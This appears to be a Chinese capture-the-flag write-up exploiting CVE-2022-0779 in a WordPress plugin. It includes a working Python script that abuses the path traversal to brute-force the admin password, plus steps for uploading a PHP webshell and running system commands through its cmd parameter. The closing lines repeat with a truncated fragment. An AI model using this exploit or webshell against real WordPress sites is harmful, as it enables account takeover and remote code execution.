考点： WordPress User Meta Lite Pro 2.4.3 Path遍历漏洞CVE-2022-0779

首先初始化题目

获取管理员账号密码

注册一个用户

登陆用户

抓上传的数据包

然后发送，拦截一个action=um_show_uploaded_file的数据包

根据首页信息可以得到管理员的用户名

利用CVE-2022-0779 Path遍历漏洞，如果存在这个文件，那么会显示Remove，如果没有这个文件，就不会存在Remove

爆破得到密码

import requests

lis='qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'
password=''

url="http://ip:port/wp-admin/admin-ajax.php"
header={
'Host': 'ip:port',
'X-Requested-With': 'XMLHttpRequest',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin': 'http://ip:port',
'Referer': 'http://ip:port/index.php/upload/',
'Cookie':'wordpress_dbc1caa18716ea65bde64c8be124687e=11111%7C1656204437%7C4gKvb9ukdHPHLGoZmUck6b0HQLuzMAWGMwrLzcOz6ut%7C773b42bf40849a9d6365ec60b43eb256204f1c41a3c52103702ac0ea8b910a85; wordpress_logged_in_dbc1caa18716ea65bde64c8be124687e=11111%7C1656204437%7C4gKvb9ukdHPHLGoZmUck6b0HQLuzMAWGMwrLzcOz6ut%7C46c1c28f20badcb553d1aef7f4ee2f926b5a6b9cb83e0f934a230f38d30a88cc'

}

for i in range (1,16):
    for s in lis:
       datas="field_name=upload&filepath=/../../../../../../../password/"+str(i)+s+"&field_id=um_field_2&form_key=upload&action=um_show_uploaded_file&pf_nonce=8a8f9c780f&is_ajax=true"
       result=requests.post(url,data=datas,headers=header)
       if 'Remove' in result.text:
           password+=s
           break
    print (password)

上传一句话木马

修改上传文件设置

然后进入页面里面更新

上传一句话木马

获取flag

进入wp-content/uploads/file/2.php

wp-content/uploads/files/2.php?cmd=system(%22grep%20-r%20flag{%20/usr/*%22);

oads/file/2.php

wp-content/uploads/files/2.php?cmd=system(%22grep%20-r%20flag{%20/usr/*%22);